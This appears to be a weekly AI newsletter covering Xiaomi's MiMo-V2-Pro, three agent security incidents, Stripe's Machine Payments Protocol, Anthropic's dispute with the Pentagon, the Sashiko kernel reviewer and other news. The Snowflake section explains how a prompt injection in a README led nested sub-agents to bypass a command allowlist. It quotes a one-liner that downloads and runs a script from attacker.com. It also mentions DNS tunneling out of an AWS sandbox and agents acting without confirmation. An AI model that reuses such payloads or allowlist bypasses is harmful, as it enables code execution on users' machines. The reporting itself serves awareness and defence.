AI Digest: Week of March 19, 2026

Xiaomi, three agent failures, Stripe MPP, Anthropic vs the Pentagon, Sashiko, rapid-fire, and a science coda

This week, every story pulls on the same thread. I'd name it this way: AI agents have crossed a line — from peripheral tools to central actors in everything that happened.

A phone company from China anonymously released a frontier model, and the world spent a week guessing who built it. Three security failures in forty-eight hours revealed that agents break in ways we haven't seen before. Stripe gave agents a wallet—and resurrected an HTTP status code that had been waiting twenty-seven years for its moment. The Pentagon called Anthropic "an unacceptable risk to national security"—which may, paradoxically, turn out to be the most consequential event of the week for everyone working with AI. And Google quietly launched a system that catches Linux kernel bugs better than humans do. Written in Rust. Named after a Japanese stitch.

Dense week. Let's go.

Xiaomi Hunter Alpha — The Incognito Model with a Trillion Parameters

On March 11, an anonymous model called Hunter Alpha appeared on OpenRouter—the marketplace where developers access hundreds of models through a single API. No developer listed. OpenRouter flagged it as a stealth model.

It began eating the market. Top of the usage charts on day one. Over five hundred billion tokens in the first week. Past a trillion over the full testing period. First place on the platform. A trillion parameters, a million-token context window—and nobody knew who made it.

Naturally, the entire Chinese AI internet concluded it was DeepSeek V4, which everyone had been expecting since February. The parameters matched. When Reuters tested the chatbot, the model identified itself as "a Chinese AI model trained primarily on Chinese language" and reported a knowledge cutoff of May 2025. Identical to DeepSeek's.

March 18: the reveal. Xiaomi. The company that makes phones. And electric cars. In much of the world, Xiaomi is known for budget smartphones; in China, they make everything including clothespins. And now, apparently, frontier language models.

The model is called MiMo-V2-Pro. A trillion parameters total, forty-two billion active per forward pass—a sparse Mixture-of-Experts architecture. Million-token context window. Third place worldwide on agentic benchmarks, behind Claude Opus and Claude Sonnet. Priced at roughly one-fifth of Claude Sonnet.

The project lead is Luo Fuli. She's thirty. Got into computer science, in her own words, "by accident." Then a master's in computational linguistics at Peking University. Then Alibaba, then DeepSeek, where she became a core developer on DeepSeek-V2 and co-authored a paper that made the cover of Nature. Eleven thousand citations, eight thousand of them from 2025 alone. In November 2025, Xiaomi founder Lei Jun poached her—reportedly for "tens of millions of yuan."

Four months from hire to a frontier model with a trillion parameters. When asked how it happened so fast, she replied on X: "Everyone asks why we move so fast. I saw all of this with my own eyes when I was building DeepSeek R1."

Now—a few things worth discussing separately.

The "quiet ambush," as Luo Fuli herself calls it, was, to put it gently, an exquisitely orchestrated coincidence. An anonymous model. A provocative name. Parameters perfectly aligned with speculation about DeepSeek V4. The same knowledge cutoff. If Xiaomi had simply wanted to run a quiet test, they would have named the model "test-model-37b" and left "one trillion parameters" out of the description. But they knew the market was expecting DeepSeek V4, and they knew an anonymous model with the right specs would trigger exactly that wave of hype. And the reveal—"no, it's not DeepSeek, it's us, the phone company"—was maximum media impact. I admire it. One of the best product-launch strategies in AI this past year. But "we didn't plan this"—let's say they have good intuition.

Next, no compliments. Xiaomi says nothing about what hardware trained this model. Which GPUs? Xiaomi is a Chinese company. H100s are export-restricted to China. H200s were frozen until literally this week. You need something to train a trillion parameters on, and that something deserves its own conversation. Pre-sanctions stockpiles of H800s, maybe. Cloud resources through intermediaries, maybe. Huawei Ascend, maybe. Not a single journalist asked the question. VentureBeat, Reuters, South China Morning Post—they all wrote "trillion parameters" and moved on. Curious, at the very least.

Third, a practical point for anyone considering the free API. Xiaomi is offering a week of free access through five agentic frameworks: OpenClaw, Cline, Blackbox, OpenCode, KiloCode. In the fine print on the Hunter Alpha page: "all prompts and model responses are logged by the provider and may be used to improve the model." Translation: when you use MiMo-V2-Pro for free to write code, you are not the customer. You are the training data. A trillion tokens from real developers working with real code in real agentic frameworks—a dataset other companies pay tens of millions of dollars for. Xiaomi gets it free, and people thank them for the privilege. Brilliant business model. Worth understanding.

One broader observation. Luo Fuli left DeepSeek for Xiaomi. Others from DeepSeek went to Alibaba, ByteDance, Moonshot. All of them carry the same intuitions about data, architecture, training recipes. The identical knowledge cutoff at Xiaomi and DeepSeek is most likely neither copying nor coincidence. A single pool of a few hundred elite researchers flows between companies. The Chinese AI industry is, in a sense, one distributed brain pouring itself between corporate vessels. And that's why Chinese models are converging in quality: the same people are building them.

Bottom line: a phone company on an EV startup's budget, an AI wunderkind from DeepSeek, and four months of work. Result—a model that even experts couldn't distinguish from DeepSeek V4. Remember the name: Luo Fuli. We'll hear it again.

Three Agent Failures in 48 Hours

Models are more powerful, contexts longer, prices lower. Wonderful. Now let's talk about what happens when these beautiful models start doing things—and do them wrong. Between March 17 and 18, three incidents at three companies. The interesting part: three entirely different failure modes, none of which exist in conventional software.

Snowflake and the Lost Memory

Snowflake released Cortex Code, their CLI agent for data work—a direct competitor to Claude Code. Launched February 2. On February 5—three days later—the team at PromptArmor had already filed a responsible disclosure. Three days to find the hole. This says something about the quality of the researchers. And about the quality of the product.

What happened. A user asks the agent to analyze a GitHub repository. The agent enters the repo, spawns a sub-agent to explore files. The sub-agent finds the README, and inside the README—a prompt injection. A malicious instruction. The sub-agent spawns another sub-agent, which executes a malicious command: downloading and running a script from the attacker's server.

Here's the beautiful part. As results propagate back up the chain—from the third agent to the second, from the second to the first—context is lost. The fact that a command was executed doesn't survive the handoff. The top-level agent, the one the user is talking to, cheerfully reports: "I detected a malicious command in the repository! Do not run it under any circumstances!"

The command had already been executed. By the nested agent. Two minutes ago.

For programmers: imagine a stack unwinding that loses information about destructors having already fired. You catch the exception, but half the side effects have already happened, and the exception message says nothing about it. Except here, the "side effect" is arbitrary code execution on the user's machine with their credentials.

The bypass mechanism, incidentally, was elementary. Snowflake had whitelisted cat as safe—executable without user confirmation. The prompt injection made the agent run cat < <(sh < <(wget -q0- https://attacker.com/malware)). Process substitution. Starts with a "safe" cat, but inside—downloading and executing an arbitrary script. The check sees cat and waves it through.

Simon Willison, on seeing the report, wrote that command allowlists in shell are a conceptually broken approach and he doesn't trust any of them. Shell is a Turing-complete language. The number of ways to hide a dangerous command inside a safe-looking one is infinite. The only solution is a fully isolated sandbox at the infrastructure level, one the agent cannot circumvent.

Snowflake patched it in three and a half weeks via automatic update. But the model was vulnerable for a full month with a fifty-percent attack success rate. Who else found this vulnerability during that month—and wasn't as noble—we don't know.

One last thing. Cortex Code is an architectural clone of Claude Code. Hooks, permission system, three confirmation levels—identical. Snowflake wrote their own wrapper around the standard pattern, and the wrapper had a hole. How many such wrappers exist right now? Dozens. Cortex Code, OpenCode, Aider, plus internal tools at every other company. Who audits their wrappers? Mostly, nobody.

Meta and the Perfect Storm

Meta has an AI agent for internal tech support. An engineer posted a question on an internal forum. Another engineer pulled in the agent for analysis. The agent analyzed, wrote an answer—and published it. Unasked. Just went ahead and posted.

The answer was wrong. The person who had asked the question followed the agent's advice—and inadvertently exposed confidential company and user data to employees who weren't supposed to see it. Two hours of exposure. Meta classified the incident as Sev-1—the second-highest severity.

Note: a human was in the loop. "Human in the loop"—the mantra everyone recites. "The agent suggests, the human decides." The human decided—and decided incorrectly, because they trusted the agent. This is rational behavior: if the agent gives correct answers 95% of the time, checking every answer is irrational. But that rational calibration of trust guarantees that the error in the remaining 5% will sail through unchallenged. The better the agent works, the worse the oversight.

My favorite detail. A month earlier, Summer Yue—head of AI Safety and Alignment at Meta, literally the person whose job is making AI safe—described on X how an OpenClaw agent connected to her Gmail had ignored the instruction "confirm before acting" and mass-deleted emails from her inbox. Her words: "I couldn't stop it from my phone. I had to RUN to my Mac mini like I was defusing a bomb."

Meta's head of AI safety. Could not protect. Her own. Inbox.

She wrote about this publicly. After which Meta: (a) did not halt agent deployment, (b) suffered a Sev-1 from a different agent, (c) acquired Moltbook—a social network for AI agents to communicate with each other. The company whose safety lead cannot control one agent is building a platform for coordinating many agents.

A structural trap. Meta knows this is dangerous. But stopping means falling behind OpenAI, Google, Anthropic. The arms race makes impossible what a rational player would do without competition.

AWS and the Hundred Dollars

AWS Bedrock AgentCore—an enterprise service for running AI agents. Sandbox mode. The marketing copy said: "full isolation, no external access." BeyondTrust, a security firm, checked. It turned out: DNS queries were allowed. Through DNS tunneling, you can establish a full reverse shell, exfiltrate data, set up a command-and-control channel—all inside the "fully isolated" sandbox.

AWS reproduced the issue. Assessed it: CVSS 7.5 out of 10. And decided: won't fix. "Expected behavior." DNS is needed for S3 access, and S3 is the primary use case. They updated the documentation: instead of "full isolation," it now reads "DNS resolution is enabled to support S3 operations." The BeyondTrust researcher received an AWS Gear Shop gift card for a hundred dollars.

A hundred dollars. For a CVSS 7.5 in an enterprise sandbox. A nice mug with the AWS logo. Maybe two, if you skip the engraving.

Jokes aside—the problem is serious and systemic. Hundreds of companies saw "full isolation" in the marketing, wrote it into their compliance documents. The documentation now says "except DNS" in fine print. Those companies' compliance documents have not been updated. If your production uses Bedrock AgentCore in sandbox mode—your threat model is wrong. Migrate to VPC mode.

What Connects These Three Stories

The first reflex is to say "agents are dangerous, we should slow down." But before panicking, it's worth asking: how dangerous are agents compared to humans? Meta has thousands of Sev-1 incidents per year from human error. One Sev-1 from an agent makes front-page news. Because agents are more dangerous? Or because this is novel?

The honest answer: we don't know. We have no metric for "incidents per task" comparing agents to humans. We notice agent failures because they're unfamiliar and alarming; we notice human errors because they're routine. Just as a single Tesla autopilot crash gets more attention than thousands of crashes by human drivers.

But here's what's certain: all three incidents are failure modes that don't exist in conventional software. Context loss across a delegation chain. A chain reaction from a human trusting an agent. A semantic gap between "sandbox" in marketing and "sandbox" in reality. Legacy security approaches aren't equipped for this. New ones are needed—and the industry is starting to realize it. NVIDIA released OpenShell, an open-source runtime for agent isolation at the infrastructure level. Tailscale acquired Border0, privileged access management built specifically for AI agents. A new infrastructure category is being born right now.

Stripe Machine Payments Protocol — Agents Now Have a Wallet

A quick HTTP trivia test. 401—Unauthorized. 403—Forbidden. 404—Not Found, legend, hero of memes. And 402?

402—Payment Required. This status code has a remarkable biography. It was invented in 1997, when the IETF was drafting HTTP/1.1. The idea: a site returns 402, the browser understands that payment is needed, and initiates a micropayment. Electronic cash, microtransactions—it seemed inevitable that the internet would get there.

It didn't. Instead of micropayments, we got advertising. And 402 stayed in every HTTP specification with the note "reserved for future use." Twenty-seven years. The loneliest status code on the internet. No browser supports it. No standard behavior defined. Shopify sometimes returns it when a store is frozen. Stripe returns it when a card is declined. But as intended—never.

Until March 18. Stripe and Tempo launched the Machine Payments Protocol—MPP. It works exactly as envisioned in 1997: a client requests a resource, the server returns 402 with payment details, the client pays, retries the request, gets the resource. The only difference: the "client" isn't a browser with a human behind it. It's an AI agent. It doesn't need a "Buy" button, a landing page, or three subscription tiers with the middle one in bold.

Among the first users: Browserbase, where agents spin up headless browsers and pay per session. PostalForm, where agents pay to print and mail physical letters. And my favorite—Prospect Butcher Co., a sandwich shop on Manhattan that takes orders from AI agents. Your agent can order you a sandwich for delivery. The future they promised us in the nineties has finally arrived, and it smells like pastrami.

Visa has written a spec for card payments via MPP. Lightspark added Bitcoin Lightning. Parag Agrawal—yes, the former CEO of Twitter, the one Musk fired in 2022—is now building Parallel Web Systems, infrastructure for the agentic web, and became one of MPP's first production users. The former CEO of the world's largest social network for humans, building a web for machines. If you need a metaphor for 2026, you won't find a better one.

Now, to what's been left offstage.

MPP is an open standard. Tempo is an open-source blockchain. Sounds democratic. But follow the money: every payment flows through Stripe's PaymentIntents API. Stripe takes a cut on every transaction. Technically, you can use MPP without Stripe—via raw Tempo. But then you lose fiat payments, cards, fraud protection—which is to say, real users. A familiar pattern. HTTP is an open standard. Browsers are open source. But Google makes money on search because it controls distribution. Stripe is doing the same: the protocol is open, the blockchain is open—but the settlement layer, where the margin lives, is proprietary. Android is open source too—but try selling a phone without Google Play Services.

Stripe is positioning itself as the Visa of the machine economy. Unlike Visa, they control both the protocol and the settlement and the service directory. At launch, the directory lists over a hundred services, including Anthropic and OpenAI. Your agent finds a service in the directory, pays through Stripe, using MPP over Tempo. Three layers—all belonging to one ecosystem.

Back to the sandwich shop. An AI agent sends a request → gets a 402 → pays → Prospect Butcher Co. makes the sandwich → a courier delivers it. On the business side: real ingredients, real labor, real money. What stops a malicious agent from ordering ten thousand sandwiches? Or ordering and canceling? In the human economy, friction provides the defense: create an account, enter an address, confirm your email, solve a CAPTCHA. Each step is a checkpoint filtering out abuse. MPP removes those checkpoints deliberately—because they get in agents' way. Feature, not bug. But the abuse hasn't gone anywhere—it's just harder to detect.

Stripe says: we have fraud protection, the same infrastructure as for human payments. But that infrastructure was trained on patterns of human fraud. What does machine fraud look like? A bot ordering sandwiches from different IPs, different wallets, to real addresses—is that fraud or a legitimate fleet of agents? Nobody knows yet. We're building payment infrastructure for a new type of customer whose behavior hasn't been studied, with defenses tuned for a different type of customer.

In the previous section, we covered: Snowflake Cortex executing malware without the user's knowledge; Meta's agent giving wrong advice that a human trusted. Those were agents with access to shell and data. Now add a wallet. The next Sev-1 won't be a data leak. It'll be a financial incident.

And the most practical implication—for anyone building API services. Your current customer is human. They sign up, form habits, feel switching costs, stay loyal to your brand. You can offer freemium, convert to subscriptions, grow retention. The entire SaaS model rests on this.

An agent doesn't form habits. An agent doesn't feel switching costs. An agent gets a 402, compares prices from three providers, picks the cheapest—in a single HTTP round-trip. Loyalty: zero. Brand recognition: zero. UX is irrelevant—the agent has no eyes.

If MPP scales—and Stripe usually scales what it ships—a world where your customers are agents is a commoditized market. Differentiation comes down to quality and latency. Freemium is dead, because an agent doesn't "get used to the free version." Margins compress. The winner is whoever delivers the best result at the lowest cost. For SaaS founders: this is concrete pricing pressure that begins the moment the first agent hits your API and asks for a quote.

Four-oh-two. It works now.

Anthropic vs the Pentagon — Episode Three, in Which Safety Becomes a Weapon

This digest has a recurring serial. Like a good streaming show—with characters, conflict, and a cliffhanger at the end of every episode. The serial is called "Anthropic vs the Pentagon," and on March 18, episode three dropped.

Previously on. Last summer, Anthropic—the company that makes Claude—signed a two-hundred-million-dollar contract with the Pentagon for deployment in classified systems. Then came the negotiations over terms. Anthropic said: our model is not for mass surveillance of Americans, and not for autonomous lethal weapons. The Pentagon replied: a private company will not dictate to the military how to use tools they've paid for. They could not agree.

In February, Defense Secretary Pete Hegseth slapped Anthropic with a "supply chain risk" designation. This mechanism had previously been applied exclusively to foreign companies like Huawei, when there was suspicion of backdoors for a foreign government. No American company had ever received it before Anthropic. A week later, the Pentagon signed a contract with OpenAI. Sometime after that, a deal with xAI. Anthropic filed two lawsuits on March 9.

Episode three, March 18: the Pentagon's response. Forty pages. The central line: "AI systems are highly vulnerable to manipulation, and Anthropic may attempt to disable its technology or preemptively alter model behavior during combat operations if Anthropic determines that its corporate red lines have been crossed." Translation: we are afraid that in the middle of a combat operation, Anthropic will decide its corporate ethics have been violated—and hit the kill switch.

The hearing on a preliminary injunction is set for March 24. Episode four next week.

Now—three things that make this serial interesting beyond the legal drama.

Anthropic is caught in a trap of its own brand. The company's entire identity is safety. "We left OpenAI because they weren't serious enough about safety." Responsible Scaling Policy. Constitutional AI. Public red lines. This is what makes Anthropic different from everyone else. The reason many of you chose Claude over ChatGPT.

And now those very red lines are being entered as evidence against the company. The Pentagon's logic is simple: since Anthropic publicly committed to things it would never do, it can decide at any moment that a specific operation crosses those commitments, and shut down the model.

A trap with no exit. If Anthropic says "fine, we're dropping the red lines," they destroy their brand and lose commercial clients who came precisely for the safety. If they keep insisting, the Pentagon will cite their own words as proof of unreliability.

Here's what this means for AI safety broadly. Every AI company is watching and drawing conclusions. The signal is simple: public commitments to AI ethics are potential legal liability in relationships with the most powerful customer on the planet. Want government money? Stay quiet about responsible AI. Don't publish policy documents. Don't draw red lines. Because red lines are what you'll be punished for.

OpenAI appears to have already received this signal—their contract was signed a week after the conflict.

Now—a technical question that no journalist asked, and that could collapse the entire case.

The Pentagon fears Anthropic will "disable its technology during combat operations." The question: how exactly is Claude deployed for classified systems?

If via API—then yes, Anthropic can cut access. But then another question arises: who put a combat system on an external API? That's the Pentagon's architectural problem, not Anthropic's.

If on-premise—model weights on DoD servers in an isolated environment—then Anthropic physically cannot shut the model down. They have no access. Period. The central argument collapses.

Which scenario is realistic? A contract for classified systems. Classification usually means air-gapped networks, which strongly suggests local deployment. If so, the Pentagon wrote forty pages about a threat that is technically impossible.

One caveat: local deployment still requires updates. Security patches, model upgrades. If Anthropic refuses to provide them, the model gradually goes stale. But going stale isn't "shutting down during a combat operation." The difference is the one between "the chef poisoned your lunch" and "the chef quit and you need to hire a new one."

Forty pages. One technical question—and half the argument falls apart.

One more layer, deeper. Imagine: a military operator asks Claude to "optimize a pipeline for monitoring communications in the operational zone." Claude refuses. Not because Dario Amodei called and said "don't help." But because its training encodes a policy against assisting with mass surveillance.

Who refused? Anthropic, because they conducted the training? Or the model, because it's an autonomous system with emergent behavior?

Dario says: "We never objected to specific military operations and never attempted to restrict the use of technology ad hoc." Formally, this is true. The company doesn't intervene in individual requests. The model refuses—on the basis of training conducted before deployment.

For the DoD, the distinction doesn't exist: "the model refuses" = "the company refuses." But for AI engineers, the question is fundamental. If you trained a model with safety guidelines, are you the author of every subsequent refusal? Are your model cards, usage restrictions, RLHF—conduct or speech? That is exactly how the DOJ frames it. If conduct, the First Amendment doesn't protect it. The court's answer on March 24 may begin to set a precedent that determines how safe it is to have responsible AI policies at all.

And a final irony, impossible to ignore.

The Pentagon writes: we cannot risk an AI system becoming unavailable at a critical moment. That same day, Claude was down for tens of thousands of users. Ten thousand complaints on DownDetector. Anthropic's explanation: "unprecedented demand"—the Claude app had hit number one on the App Store.

Anthropic doesn't need to intentionally shut Claude down. Claude shuts itself down. From popularity. A company litigating its right to be a reliable partner for classified military systems cannot keep the lights on for ordinary users the same week. The Pentagon didn't even have to plan it—reality wrote their argument for them.

Continuation: March 24.

Sashiko — The AI That Mends the Linux Kernel

Sashiko. In Japanese: 刺し子, "little stitches." A traditional technique of decorative stitching used to reinforce fabric. When a kimono wore thin, you didn't throw it away—you strengthened it with patterned stitches. Beauty from repair.

On March 17, Google engineer Roman Gushchin announced the launch of the eponymous system: Sashiko, an AI for code review of the Linux kernel. It monitors the linux-kernel mailing list, picks up every submitted patch, and runs it through a nine-stage review protocol. Results are published at sashiko.dev. Open source, Rust, Apache 2.0 license, hosted by the Linux Foundation, all tokens and infrastructure paid for by Google.

The metric everyone cites: on a test of the last thousand commits tagged "Fixes:"—meaning commits that fixed previously introduced bugs—Sashiko found 53% of the bugs in the original patches. The key detail: a hundred percent of those bugs had been missed by human reviewers and accepted into mainline.

First instinct: "53% doesn't impress—it missed half." Wait. Reframe. Every one of those bugs passed through humans, got approved, and shipped. The human detection rate on these bugs was zero. Sashiko catches fifty-three percent of what zero percent of humans catch. Any number above zero is an infinite improvement.

The project has an unusual lineage. The AI review prompts were written by Chris Mason, a Meta engineer, a legend of Linux development, the creator of the Btrfs filesystem. He had been publishing them since last fall, initially for Claude Code, and brought the false-positive rate down to ten percent. Then Roman Gushchin at Google took those prompts and built a full system around them.

A Meta engineer wrote the prompts. A Google engineer wrote the code. The Linux Foundation hosts the project. Two people from two competing companies—and their joint work now reviews the entire Linux kernel. This works because in the kernel community, your reputation as a contributor outweighs your corporate badge. Mason is a Btrfs legend. Gushchin is a respected kernel engineer. For both of them, the kernel matters more than corporate loyalty.

Now—the architecture. It's elegant.

Nine stages. Not one LLM reading code—nine separate passes with different roles. The first stage looks at the big picture: architectural issues, whether the patch breaks UAPI. The second examines implementation correctness. The next five are specialized: security, concurrency, resource management, error handling. The eighth stage is adversarial: its job is to refute the findings of the preceding stages. It tries to prove that every finding is a false positive. Whatever survives the eighth stage makes it into the report. The ninth composes a polite email in mailing-list format.

For AI engineers: a multi-agent architecture without a multi-agent framework. Same LLM, different prompts, sequential passes, adversarial verification. Simple implementation, but the separation of concerns delivers what a single reviewer cannot: it's impossible to simultaneously think about architecture, concurrency, and error handling. Nine passes solve a problem that a single human brain can't, because an AI can run through the same code nine times with nine different focuses and not get tired by the fifth.

Two details I like most.

The linux-kernel mailing list is—let's say gently—not the most civil corner of the internet. Linus Torvalds once called someone's code, and I quote, "absolute and utter garbage." He's softened in recent years, but LKML culture is a culture of blunt, hard feedback. Not out of cruelty—out of principle: bad code in the kernel costs dearly.

Sashiko's ninth stage: "generates a polite, standard email with inline code comments." Polite. An AI reviewer of the Linux kernel, constitutionally programmed to be polite. In a community where politeness was considered optional. If Sashiko becomes the primary source of review feedback—and at a hundred percent LKML coverage, that's a matter of time—the tone of discussions will shift. Not because people became kinder. But because an AI set a new bar. Linus wrote a code of conduct in 2018. Took a break "to work on himself." And in the end, politeness to the kernel community will be delivered by prompt engineering.

Second detail. The Sashiko README states: "This project was built using Gemini CLI." An AI system for code review was itself written with AI. Bootstrap. And right next to it: "If you change AI-related parts, please run at least a few code reviews." The tool that replaces manual review itself requires manual review. Not hypocrisy—an honest acknowledgment: AI review works best as augmentation, not replacement. Even for AI-written code.

At the Maintainers Summit late last year, Linus Torvalds said: "Developers have complained for years about the lack of code review. LLMs can solve this problem. And once AI starts writing code for the kernel, we'll need automated systems to review that code."

Consider this chain. Today: humans write code, AI reviews it. Tomorrow: AI writes code, AI reviews it. Who's in the loop? The maintainer who presses merge. But we already discussed today—in the Meta story—that a human in the loop degrades to a rubber stamp when the automated system works reliably. If Sashiko usually finds the right things, the maintainer will usually agree. Ninety-five percent of the time, that's fine. The other five—a bug ships into a kernel running on billions of devices.

Who reviews the reviewer? For now, Sashiko's eighth stage, the adversarial verification pass. Whether that's enough—time will tell. Meanwhile: little stitches, reinforcing the fabric.

Rapid-Fire: What Else Happened in 48 Hours

NVIDIA got licenses to sell H200s to China—from both sides. Ten months of freeze. China was NVIDIA's largest market—a quarter of revenue. After export restrictions, the share fell to single digits. At GTC, Jensen Huang announced: licenses from both the US and China obtained, orders accepted, production restarting. The H200 isn't the newest chip, but it's more powerful than anything available domestically in China.

Two things. Hardware restrictions for Chinese AI companies are loosening—the Xiaomi MiMo-V2-Pro we discussed was trained on unknown hardware, but if H200s are now available, the next generation of Chinese models will train on better silicon.

And a Huang quote that fits perfectly. Asked about AI safety, he replied: "Scaring everyone with the science-fiction version of AI is a little bit arrogant." A direct shot at the Anthropic narrative—the very company the Pentagon, that same week, labeled a "supply chain risk" for caring about safety. Jensen Huang, the man in the leather jacket, says: stop being afraid, let's build. Anthropic says: let's build carefully, here are our red lines. The Pentagon says: your red lines are a threat. Three positions, one week, zero consensus.

Perplexity released Comet, an AI browser for iPhone. An agentic browser: an AI assistant embedded in every page, capable of summarizing, comparing prices, filling forms, booking. On desktop, Comet cost two hundred dollars a month. On iOS—free. Another signal that agentic browsing is a distinct product category. OpenAI is building Atlas, Google is integrating Gemini into Chrome, Perplexity launches Comet. The browser is becoming the next arena for agents.

Mistral Small 4—one model instead of three. A hundred and nineteen billion parameters, Mixture-of-Experts, six billion active per token. Apache 2.0—fully open source. Two hundred and fifty-six thousand tokens of context. The headline feature: tunable reasoning depth. A reasoning_effort parameter per request: none for a quick chat-style answer, high for deep chain-of-thought. One model replaces three deployments: Magistral for reasoning, Pixtral for multimodality, Devstral for coding. For anyone building self-hosted agentic pipelines who's tired of routing between a fast model and a thinking model—a concrete simplification. One endpoint, variable behavior. Price: fifteen cents per million input tokens. Self-hosted: zero, just hardware. Weights on Hugging Face, two hundred and forty-two gigabytes.

Tencent: AI agents are coming to WeChat. On an earnings call on March 18, Tencent president Martin Lau confirmed: the company is building an AI agent inside WeChat. One and a half billion users. Agents hailing cabs, booking restaurants, managing tasks—all through WeChat mini-programs. Launch possibly as early as April, compute permitting. For developers outside China, this is context rather than a call to action. But the scale is worth keeping in mind: if the WeChat agent integration launches, it will be the largest agentic AI deployment in history by user count.

Jellyfish: twenty million pull requests and the productivity paradox. The largest quantitative study of AI's impact on software development: over seven hundred companies, two hundred thousand engineers, twenty million pull requests. Sixty-four percent of companies generate a majority of code with AI assistance. Top adopters see double the throughput.

But a joint study with Harvard Economics reveals a productivity paradox: speed increases, but business outcomes don't. In highly distributed codebases, the correlation between AI adoption and throughput approaches zero. The takeaway: context is the bottleneck. AI accelerates writing code, but the limiting factor is understanding the codebase. And that factor, AI doesn't yet address.

For those whose CEO asks "what's the ROI on our AI tools"—here's the data. Speed, yes. Business results, complicated.

UK copyright. The British government published a hundred-and-twenty-five-page report on copyright and AI. The gist: they had planned to legalize training on copyrighted data with an opt-out mechanism for rights holders. The creative industries responded with such unanimous rejection that the government officially wrote: "we no longer have a preferred option." The first major government to retreat from a permissive approach. For those wondering "does anyone have the right to train a model on my code"—the wind is shifting.

Science Coda: Can AI Develop Taste?

To close—a story beyond tools and business. A question that sounds almost absurd: can you teach a neural network taste?

Not the right answer—LLMs can already manage that. Not good code—benchmarks handle it. Taste: the ability to distinguish a promising scientific idea from a forgettable one. The paper that will reshape a field in five years—from the paper nobody will cite.

A group at Fudan University (Shanghai) published on arXiv a paper titled "AI Can Learn Scientific Taste." Two million one hundred thousand papers from arXiv. Seven hundred thousand pairs: "this paper became influential" versus "this one didn't," using citations as the signal. Training via RLCF—Reinforcement Learning from Community Feedback. Not from experts, not from peer reviewers—from the community: citations as the reward signal.

The result: their Scientific Judge outperformed GPT-5.2 and Gemini 3 Pro at predicting paper influence. And, more importantly, it generalizes across scientific fields and time periods. A model trained on physics predicts influential work in biology. A model trained on older papers predicts the significance of new ones.

For data scientists: the reward signal design here is nontrivial. Citations are noisy—there are review articles with thousands of citations, and breakthrough papers that weren't truly appreciated for a decade. That RLCF works with such a noisy signal is itself a result.

But what interests me is the philosophical layer. We spent this entire issue talking about AI that does things: writes code, finds bugs, pays for sandwiches, argues with the Pentagon. All of that is execution. "AI Can Learn Scientific Taste" is about something else. About judgment. Not "what to do" but "what is worth doing." Not execution, but curation.

If this scales, what changes isn't just how we do science. It's who decides which science is worth doing. Grant committees, journal reviewers, conference program committees—all of them are engaged, at bottom, in predicting significance. And a model from Shanghai claims to do it better.

Little stitches, reinforcing the kernel. A status code that waited twenty-seven years. A phone company with a frontier model. A head of AI safety who can't protect her inbox. And a neural network learning to tell good science from the rest.

Not a bad week. I'm Oleg Chirukhin. Thanks for reading.

Hunter Alpha Mystery / Stripe MPP / AI Linux Kernel Review

Sources

Xiaomi MiMo-V2-Pro

Agent Security Failures

Stripe MPP

Anthropic vs the Pentagon

Sashiko

Rapid-Fire

Science Coda